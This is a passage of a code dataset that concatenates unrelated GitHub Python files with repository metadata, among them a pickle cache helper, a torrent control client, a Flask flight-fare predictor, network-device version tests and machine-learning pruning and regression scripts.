(str): unique name to id the object\n assoc_path (str) : the associated match file\n location (path): place to store recovery objects, use match_file location if None.\n '''\n self.assoc_path = assoc_path\n self.name = name\n self.obj_file = self.get_obj_file(location)\n\n def get_obj_file(self, location=None):\n result = self.assoc_path+'.%s' % self.name\n if location:\n name = os.path.basename(result)\n result = os.path.join(location, name)\n return result\n\n def load(self,):\n obj = None\n if self.obj_file:\n if os.path.isfile(self.obj_file):\n obj_file_m_time = os.path.getmtime(self.obj_file)\n assoc_path_m_time = 0\n if os.path.isfile(self.assoc_path) or os.path.isdir(self.assoc_path):\n assoc_path_m_time = os.path.getmtime(self.assoc_path)\n if assoc_path_m_time > 0 and obj_file_m_time >= assoc_path_m_time:\n # not a new file, read goodobj from file\n print(\"Recovering %s from %s\" % (self.name, self.obj_file))\n with open(self.obj_file, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\n def store(self, obj):\n print(\"Storing %s into %s\" % (self.name, self.obj_file))\n with open(self.obj_file, 'wb') as f:\n pickle.dump(obj, f)\n","repo_name":"rotsehub/rotseana","sub_path":"py/rotseana/findburst/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"36201970693","text":"import asyncio\nimport logging # for event logging system\nfrom typing import Callable, TypeVar #to simplify complex type signatures (specifies format)\n\nfrom torrent_client.control.manager import ControlManager\nfrom torrent_client.control.server import ControlServer\n\n\n__all__ = ['ControlClient']\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nT = TypeVar('T')\n\n\nclass ControlClient:\n def __init__(self):\n self._reader = None # type: asyncio.StreamReader\n self._writer = None # type: asyncio.StreamWriter\n\n async def connect(self):\n #if port is in range(6995 to 6999)\n for port in ControlServer.PORT_RANGE:\n try:\n self._reader, self._writer = await asyncio.open_connection(host=ControlServer.HOST, port=port)\n\n message = await self._reader.readexactly(len(ControlServer.HANDSHAKE_MESSAGE))\n if message != ControlServer.HANDSHAKE_MESSAGE:\n raise RuntimeError('Unknown control server protocol')\n except Exception as e:\n self.close()\n self._reader = None\n self._writer = None\n logger.debug('failed to connect to port %s: %r', port, e) # else connection fails with given port no\n else:\n break\n else:\n raise RuntimeError('Failed to connect to a control server') \n\n async def execute(self, action: Callable[[ControlManager], T]) -> T:\n ControlServer.send_object(action, self._writer)\n result = await ControlServer.receive_object(self._reader)\n\n if isinstance(result, Exception):\n raise result\n return result\n\n def close(self):\n if self._writer is not None:\n self._writer.close()\n\n async def __aenter__(self) -> 'ControlClient':\n await self.connect()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n self.close()\n","repo_name":"srilekha30/bit_torrent","sub_path":"bit_torrent/torrent_client/control/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34019762001","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nfrom flask_cors import cross_origin\r\nimport pandas as pd\r\nimport sklearn\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('rf_model.pkl', 'rb'))\r\n\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef home_page():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/Prediction', methods=[\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef predict_page():\r\n if request.method == \"POST\":\r\n\r\n # extract features from Date of journey\r\n dep_date = request.form['Dep_Time']\r\n\r\n Journey_Day = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").day)\r\n Journey_Month = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").month)\r\n\r\n # Departure time\r\n Dep_Hour = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").hour)\r\n Dep_Min = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").minute)\r\n\r\n # Arrival time\r\n arrival_date = request.form[\"Arrival_Time\"]\r\n Arrival_Hour = int(pd.to_datetime(arrival_date, format=\"%Y-%m-%dT%H:%M\").hour)\r\n Arrival_Min = int(pd.to_datetime(arrival_date, format=\"%Y-%m-%dT%H:%M\").minute)\r\n\r\n # Duration\r\n Duration_Hours = abs(Arrival_Hour - Dep_Hour)\r\n Duration_Min = abs(Arrival_Min - Dep_Min)\r\n\r\n # Get stops\r\n Total_Stops = int(request.form[\"stops\"])\r\n\r\n # ----------------------\r\n # getting source info\r\n Source = request.form[\"Destination\"]\r\n if Source == 'Delhi':\r\n sc_Delhi = 1\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Kolkata'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 1\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Mumbai'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 1\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Chennai'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 1\r\n\r\n else:\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n # -------------------------------------------\r\n # Getting Destination\r\n\r\n Destination = request.form[\"Destination\"]\r\n if Destination == 'Cochin':\r\n d_Cochin = 1\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Delhi':\r\n d_Cochin = 0\r\n d_Delhi = 1\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'New_Delhi':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 1\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Hyderabad':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 1\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Kolkata':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 1\r\n\r\n else:\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n # ---------------------------------------------\r\n # Get Airline\r\n airline = request.form['airline']\r\n if airline == 'Jet Airways':\r\n Jet_Airways = 1\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n elif (airline == 'IndiGo'):\r\n Jet_Airways = 0\r\n IndiGo = 1\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Air India'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 1\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Multiple carriers'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 1\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'SpiceJet'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 1\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Vistara'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 1\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'GoAir'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 1\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Multiple carriers Premium economy'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 1\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Jet Airways Business'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 1\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Vistara Premium economy'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 1\r\n Trujet = 0\r\n\r\n elif (airline == 'Trujet'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 1\r\n\r\n else:\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n # make prediction\r\n prediction = model.predict([[\r\n Total_Stops,\r\n Journey_Day,\r\n Journey_Month,\r\n Dep_Hour,\r\n Dep_Min,\r\n Arrival_Hour,\r\n Arrival_Min,\r\n Duration_Hours,\r\n Duration_Min,\r\n Air_India,\r\n GoAir,\r\n IndiGo,\r\n Jet_Airways,\r\n Jet_Airways_Business,\r\n Multiple_carriers,\r\n Multiple_carriers_Premium_economy,\r\n SpiceJet,\r\n Trujet,\r\n Vistara,\r\n Vistara_Premium_economy,\r\n sc_Chennai,\r\n sc_Delhi,\r\n sc_Kolkata,\r\n sc_Mumbai,\r\n d_Cochin,\r\n d_Delhi,\r\n d_Hyderabad,\r\n d_Kolkata,\r\n d_New_Delhi]])\r\n\r\n # round it to 2 decimals only\r\n price = round(prediction[0], 2)\r\n return render_template('prediction.html', prediction=price)\r\n else:\r\n return render_template('index.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"AdiShirsath/Machine_learning_projects","sub_path":"Regression_Problems/Flight_Fare_Prediction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"3812616996","text":"#!/usr/bin/env python\nimport roslibpy\nimport time\n\nfrom common.shared import to_epoch, init_logging\nfrom twisted.internet import reactor\n\nreactor.timeout = lambda: 0.0001\n\ninit_logging()\n\nros = roslibpy.Ros(\"ws://localhost:9090\")\n\n\ndef sub(msg):\n # The `age` of the message should remain constant, but it increases seemingly indefinetly\n age = time.time() - to_epoch(msg[\"stamp\"])\n print(\"Age of message: %6.3f seconds\" % age)\n time.sleep(0.5) # increase if necessary; above a certain loop time the described behavior occurs\n\n\nts = roslibpy.Topic(ros, \"/test\", \"std_msgs/Header\", queue_length=1)\nts.subscribe(sub)\n\nros.run_forever()\n","repo_name":"HWiese1980/roslibpytest","sub_path":"scripts/test_sub.py","file_name":"test_sub.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41205852300","text":"from __future__ import annotations\n\n# Need to keep List for pydantic in python 3.8\nfrom typing import List\n\nfrom anta.models import AntaCommand, AntaTest\n\n\nclass VerifyEOSVersion(AntaTest):\n \"\"\"\n Verifies the device is running one of the allowed EOS version.\n \"\"\"\n\n name = \"VerifyEOSVersion\"\n description = \"Verifies the device is running one of the allowed EOS version.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show version\")]\n\n class Input(AntaTest.Input): # pylint: disable=missing-class-docstring\n versions: List[str]\n \"\"\"List of allowed EOS versions\"\"\"\n\n @AntaTest.anta_test\n def test(self) -> None:\n command_output = self.instance_commands[0].json_output\n if command_output[\"version\"] in self.inputs.versions:\n self.result.is_success()\n else:\n self.result.is_failure(f'device is running version {command_output[\"version\"]} not in expected versions: {self.inputs.versions}')\n\n\nclass VerifyTerminAttrVersion(AntaTest):\n \"\"\"\n Verifies the device is running one of the allowed TerminAttr version.\n \"\"\"\n\n name = \"VerifyTerminAttrVersion\"\n description = \"Verifies the device is running one of the allowed TerminAttr version.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show version detail\")]\n\n class Input(AntaTest.Input): # pylint: disable=missing-class-docstring\n versions: List[str]\n \"\"\"List of allowed TerminAttr versions\"\"\"\n\n @AntaTest.anta_test\n def test(self) -> None:\n command_output = self.instance_commands[0].json_output\n command_output_data = command_output[\"details\"][\"packages\"][\"TerminAttr-core\"][\"version\"]\n if command_output_data in self.inputs.versions:\n self.result.is_success()\n else:\n self.result.is_failure(f\"device is running TerminAttr version {command_output_data} and is not in the allowed list: {self.inputs.versions}\")\n\n\nclass VerifyEOSExtensions(AntaTest):\n \"\"\"\n Verifies all EOS extensions installed on the device are enabled for boot persistence.\n \"\"\"\n\n name = \"VerifyEOSExtensions\"\n description = \"Verifies all EOS extensions installed on the device are enabled for boot persistence.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show extensions\"), AntaCommand(command=\"show boot-extensions\")]\n\n @AntaTest.anta_test\n def test(self) -> None:\n boot_extensions = []\n show_extensions_command_output = self.instance_commands[0].json_output\n show_boot_extensions_command_output = self.instance_commands[1].json_output\n installed_extensions = [\n extension for extension, extension_data in show_extensions_command_output[\"extensions\"].items() if extension_data[\"status\"] == \"installed\"\n ]\n for extension in show_boot_extensions_command_output[\"extensions\"]:\n extension = extension.strip(\"\\n\")\n if extension != \"\":\n boot_extensions.append(extension)\n installed_extensions.sort()\n boot_extensions.sort()\n if installed_extensions == boot_extensions:\n self.result.is_success()\n else:\n self.result.is_failure(f\"Missing EOS extensions: installed {installed_extensions} / configured: {boot_extensions}\")\n","repo_name":"arista-netdevops-community/anta","sub_path":"anta/tests/software.py","file_name":"software.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"} +{"seq_id":"2744864539","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom timm.scheduler import CosineLRScheduler\nfrom timm.models import create_model\n\nimport numpy as np\nimport os\nimport argparse\n\nimport utils\nimport pruner\nimport models\n\nparser = argparse.ArgumentParser()\n\n# model config\nparser.add_argument('--model')\nparser.add_argument('--pretrain', action='store_true')\n\n# training config\nparser.add_argument('--dataset', choices=['cifar10', 'cifar100'])\nparser.add_argument('--batch_size', type=int, default=128)\nparser.add_argument('--epochs', type=int, default=150)\n\n# pruning config\nparser.add_argument('--pruning', action='store_true')\nparser.add_argument('--sparsity', type=float)\nparser.add_argument('--method', choices=['random', 'magnitude', 'snip', 'grasp', 'snip_magnitude'])\nparser.add_argument('--alpha', type=float)\n\n# else\nparser.add_argument('--save_dir', default='./outputs')\nparser.add_argument('--seed', type=int, default=428)\n\nargs = parser.parse_args()\n\ndef main():\n device = torch.cuda.device_count()\n print('num gpus:', device)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n\n if args.dataset == 'cifar10':\n num_classes = 10\n elif args.dataset == 'cifar100':\n num_classes = 100\n utils.mixup_args['num_classes'] = num_classes\n train_loader, valid_loader = utils.get_dataloader(args.dataset, args.batch_size, data_download=True)\n\n model = create_model(args.model, pretrained=args.pretrain)\n model.head = nn.Linear(model.head.in_features, num_classes)\n if args.pretrain:\n init_data = model.state_dict()\n \n # pruning\n if args.pruning:\n print('pruning method:', args.method)\n print('sparsity:', args.sparsity)\n\n if 'mixer' in args.model:\n rm_modules = models.mixer_rm_modules(model)\n elif 'vit' in args.model:\n rm_modules = models.vit_rm_modules(model)\n elif 'pool' in args.model:\n rm_modules = models.pool_rm_modules(model)\n\n if args.method == 'random':\n pruner.SCORE = pruner.random(rm_modules)\n elif args.method == 'magnitude':\n pruner.SCORE = pruner.magnitude(rm_modules)\n elif args.method == 'snip':\n pruner.SCORE = pruner.snip(model, rm_modules, train_loader, device)\n elif args.method == 'grasp':\n pruner.SCORE = pruner.grasp(model, rm_modules, train_loader, device)\n elif args.method == 'snip_magnitude':\n pruner.SCORE = pruner.snip_magnitude(model, rm_modules, train_loader, device, args.alpha)\n \n model = create_model(args.model, pretrained=args.pretrain)\n model.head = nn.Linear(model.head.in_features, num_classes)\n if args.pretrain:\n model.load_state_dict(init_data)\n\n if 'mixer' in args.model:\n rm_modules = models.mixer_rm_modules(model)\n elif 'vit' in args.model:\n rm_modules = models.vit_rm_modules(model)\n elif 'pool' in args.model:\n rm_modules = models.pool_rm_modules(model)\n\n pruner.prune.global_unstructured(\n rm_modules,\n pruning_method=pruner.Pruner,\n amount = args.sparsity\n )\n\n # saving config\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n\n save_path = args.save_dir + r'/' + args.model\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n \n if args.pruning:\n save_path = save_path + r'/' + args.method\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n if args.method == 'snip_magnitude':\n file_name = 'alpha{}_sparsity{}.chkpt'.format(args.alpha, int(args.sparsity * 100))\n else:\n if not args.pruning:\n file_name = 'non_pruning.chkpt'\n else:\n file_name = 'sparsity{}.chkpt'.format(int(args.sparsity * 100))\n if not args.pretrain:\n file_name = 'fs' + file_name\n \n\n\n history = {\n 'train_loss': [],\n 'valid_top1_acc': [],\n 'valid_top5_acc': [],\n 'valid_loss': [],\n 'best_epoch': 0,\n 'best_model': None\n }\n\n optimizer = optim.Adam\n loss_func = nn.CrossEntropyLoss()\n scheduler = CosineLRScheduler(\n optim.Adam(nn.Linear(1, 1).parameters()), t_initial=args.epochs, \n lr_min=1e-4, \n warmup_t=10, \n warmup_lr_init=5e-5, \n warmup_prefix=True\n )\n\n # training\n best_loss = float('inf')\n\n\n for epoch in range(args.epochs):\n lr = scheduler.get_epoch_values(epoch)[0]\n \n train_loss = utils.train_multi_gpu(\n model, train_loader, loss_func, optimizer, device, epoch+1, lr=lr, mixup=True\n )\n valid_loss, valid_top1_acc, valid_top5_acc = utils.validation_multi_gpu(\n model, valid_loader, loss_func, device, epoch+1\n )\n model.zero_grad()\n \n history['train_loss'].append(train_loss) \n history['valid_top1_acc'].append(valid_top1_acc)\n history['valid_top5_acc'].append(valid_top5_acc)\n history['valid_loss'].append(valid_loss)\n \n print('top1-acc:', valid_top1_acc)\n if best_loss > valid_loss:\n best_loss = valid_loss\n history['best_epoch'] = epoch\n history['best_model'] = model.state_dict()\n print('updated best loss!')\n \n print('best acc:', max(history['valid_top1_acc']))\n \n torch.save(history, os.path.join(save_path, file_name))\n\nif __name__ == '__main__':\n main()","repo_name":"tuna0724/Pruning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69925350949","text":"\"\"\"\nRuns a model on a single node across multiple gpus.\n\"\"\"\nimport os\nfrom pathlib import Path\n\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib.font_manager import findfont, FontProperties\nimport configargparse\nimport matplotlib.font_manager as fm\n\nfrom src.DeepRegression import Model\nfrom src.mcqr.mcqr_regression import MC_QR_prediction_for_regression\n\n\ndef main(hparams):\n\n my_font = fm.FontProperties(fname=\"/mnt/zhengxiaohu/times/times.ttf\")\n\n if hparams.gpu == 0:\n device = torch.device(\"cpu\")\n else:\n ngpu = \"cuda:\"+str(hparams.gpu-1)\n print(ngpu)\n device = torch.device(ngpu)\n model = Model(hparams).to(device)\n\n # print(hparams)\n # print()\n\n # Model loading\n model_path = os.path.join(f'lightning_logs/version_' +\n hparams.test_check_num, 'checkpoints/')\n ckpt = list(Path(model_path).glob(\"*.ckpt\"))[0]\n # print(ckpt)\n\n model = model.load_from_checkpoint(str(ckpt))\n\n model.eval()\n model.to(device)\n mae_test = []\n\n # Testing Set\n root = hparams.data_root\n test_list = hparams.test_list\n file_path = os.path.join(root, test_list)\n root_dir = os.path.join(root, 'test', 'test')\n\n if not os.path.exists(f'./outputs/mcs_pre_003'):\n os.mkdir(f'./outputs/mcs_pre_003')\n with open(file_path, 'r') as fp:\n i = 23000\n for line in fp.readlines():\n print(i)\n # Data Reading\n data_path = line.strip()\n path = os.path.join(root_dir, data_path)\n data = sio.loadmat(path)\n u_obs = data[\"u_obs\"]\n u_obs = torch.Tensor(u_obs)\n\n u_obs = ((u_obs - hparams.mean_layout) / hparams.std_layout).unsqueeze(0).unsqueeze(0)\n zeros = torch.zeros_like(u_obs)\n u_obs = torch.where(u_obs<0, zeros, u_obs)\n u_obs = u_obs.to(device)\n \n with torch.no_grad():\n heat_pre, std= MC_QR_prediction_for_regression(500, u_obs, model, tau='all')\n \n heat_pre = heat_pre.squeeze(0).cpu().numpy() * hparams.std_heat + hparams.mean_heat\n std = std.squeeze(0).cpu().numpy()* hparams.std_heat\n \n data_dir = '/mnt/zhengxiaohu/PIRL/outputs/mcs_pre_003/'\n file_name = f'mcs_{i}.mat'\n i += 1\n \n u_obs_0 = u_obs.squeeze(0).squeeze(0).cpu()\n u_obs_298 = u_obs_0 * hparams.std_heat + hparams.mean_heat\n u_obs = torch.where(u_obs_298==298, u_obs_0, u_obs_298).numpy()\n path = data_dir + file_name\n data = {\"u_pre\": heat_pre, \n \"std\": std}\n sio.savemat(path, data)\n\n\n","repo_name":"Xiaohu-Zheng/Physics-informed-Deep-MC-QR","sub_path":"src/mcs_pre.py","file_name":"mcs_pre.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71053132071","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\n# Simple linear equation solver.\n# ax+b = c\ndef solve1(a, b, c):\n return (c-b)/a\n\n# 2x+1 = 5\nprint('2x+1=5, x=', solve1(2,1,5))\n\n# (10+j5)x+5=20\nprint('(10+j5)x+5 = 20, x=', solve1(10+5j,5,20))\n\n\n# In[36]:\n\n\nimport matplotlib.pyplot as plt\n\n# Set of complex points.\nS = {2+2j, 3+2j, 1.75+1j, 2+1j, 2.25+1j,\n 2.5+1j, 2.75+1j, 3+1j, 3.25+1j}\n\nreals = [z.real for z in S]\nimags = [z.imag for z in S]\n\n# Plot points by uinsg pyplot.\nplt.title('Complex points')\nplt.xlabel('Real')\nplt.ylabel('Imagenary')\nplt.xlim([0, 6])\nplt.ylim([0, 6])\nplt.plot(reals, imags, '.')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"guhwanbae/GuLA","sub_path":"field/complex-field/complex_class.py","file_name":"complex_class.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"25366801428","text":"\n\nimport os\n\nparent_folder = \"D:/Data/kg_core/real/\"\n\n# Create a list to store the organized information\norganized_data = []\n\n# Traverse through the subfolders\nfor subfolder in os.listdir(parent_folder):\n subfolder_path = os.path.join(parent_folder, subfolder)\n\n # Check if the path is a directory\n if os.path.isdir(subfolder_path):\n\n # Traverse through the files in the subfolder\n for file_name in os.listdir(subfolder_path):\n file_path = os.path.join(subfolder_path, file_name)\n\n # Check if the file contains \"core.dat\" in its name\n if \"core.dat\" in file_name:\n\n # Extract the first and second integers from the file name\n first_integer, second_integer = file_name.split(\"_\")[:2]\n\n # Read the number of nodes and running time from the file\n with open(file_path, \"r\") as file:\n number_of_nodes = file.readline().strip()\n running_time = file.readline().strip()\n\n # Determine the Type based on the values of first_integer and second_integer\n if first_integer == \"3\":\n # Set Type as 1 for k=3\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 1\"])\n else:\n # Set Type as 2 for varying k\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 2\"])\n\n # Add an additional entry with Type 2 for the case 3, 3\n if first_integer == \"3\" and second_integer == \"3\":\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 2\"])\n\n# Print the organized information\nfor data in organized_data:\n print(\"\\t\".join(data))\n","repo_name":"dahee-e/kgcore","sub_path":"result_organize.py","file_name":"result_organize.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34005878996","text":"# odd_or_even_without_%_operator\n# Method 1 : Using Brute Force\n# This method simply checks if the given input integer is divisible by 2 or not. If it’s divisible then print Even or Odd otherwise.\nnum=int(input('enter the num: '))\nif num % 2 == 0: \n print(\"Given number is Even\") \nelse: \n print(\"Given number is Odd\")\n\n\n# Method 2 : Using Ternary Operator\n# This Method uses the ternary operator to check if the integer input is divisible by 2, If true print Even or Odd otherwise.\nprint(\"Even\") if num%2 == 0 else print(\"Odd\")\n\n\n# Method 3 : Using Bitwise Operator\n# This Method uses bitwise operators to check if a given number is Even or Odd.\ndef odd_or_even(n):\n if n&1==1:\n return f'{n} is odd number'\n return f'{n} is even number'\nprint(odd_or_even(19))\n\n","repo_name":"PTHARRISH/Python-Notes","sub_path":"codes/2.odd_or_even.py","file_name":"2.odd_or_even.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"70943164069","text":"import os, time, re, datetime\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom osgeo import gdal, ogr\nfrom codes.image_processing import extend, open_tiff, create_tiff\n\nfrom codes.imgtotensor_patches_samples_two import ImageDataset\nfrom codes.loader import dsloader\nfrom codes.check_gpu import on_gpu\nfrom random import sample\nfrom codes.otsu_avg import otsu\n\n\ndef create_dir(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ngpu = on_gpu() # We check if we can work on GPU, GPU RAM should be >4Gb\nprint (\"ON GPU is \"+str(gpu))\n\n\nstart_time = time.time()\nrun_name = str(time.strftime(\".%Y-%m-%d_%H%M\"))\nprint (run_name)\n\n\n\n# Here we choose the type of the output of the encoding model\n# If there is no pooling, we get one output variable (encoded features)\n# If there is pooling, we get two outputs (encoded features and pooling indicies)\nlist_types_of_return = [\"no_pooling\", \"pooling\"]\n\n\n#Parameters\ntype_of_return = list_types_of_return[0]\npatch_size = 7\nbands_to_keep = 3\nepoch_nb = 1\nbatch_size = 150\nlearning_rate = 0.00005\nsampleTrue = False\nmaskTrue = True # if we apply mask to computa changes to particular areas\nsatellite = \"S2\"\ncity_name = \"Rostov\"\n\n\n\n# Here we give the parameters of the pre-trained model, fo we will fine-tune it later\nreference_model = \"2019-11-12_1705\" # model run time\nepoch_model = 3 # epoch we want to use\nloss_model = 2.29e-05 # loss value of this epoch\npath_models = os.path.expanduser('~/Desktop/Results/RESULTS_CHANGE_DETECTION/NN_Rostov_S2_all_images_model_pretrained/') # global path for the results for the chosen dataset\nfolder_pretrained_results = \"All_images_ep_3_patch_7.2019-11-12_1705/\" # folder with all the results for the chosen model\n\n\n# Path do the dataset with images\n# path_datasets = os.path.expanduser('~/Desktop/Datasets/Montpellier_SPOT5_Clipped_relatively_normalized_03_02_mask_vegetation_water_mode_parts_2004_no_DOS1_/')\npath_datasets = os.path.expanduser('~/Desktop/Datasets/Rostov_S2_Concatenated_Clipped_norm_without_2016_filtered/')\n\nif maskTrue:\n path_mask = os.path.expanduser('~/Desktop/Datasets/Rostov_S2_Defected_clipped/')\n\nmodel_folder = folder_pretrained_results + \"model.\"+reference_model\n\n\n# We open extended images to calculate the min and max of the dataset to normalize the image values from 0 to 1\nimages_list = np.sort(os.listdir(path_datasets))\npath_list = []\nlist_image_extended = []\nlist_image_date = []\nnew_images_list = []\nif maskTrue:\n list_image_extended_temp = []\n list_image_mask = []\nfor image_name_with_extention in images_list:\n # if image_name_with_extention.endswith(\".TIF\") and 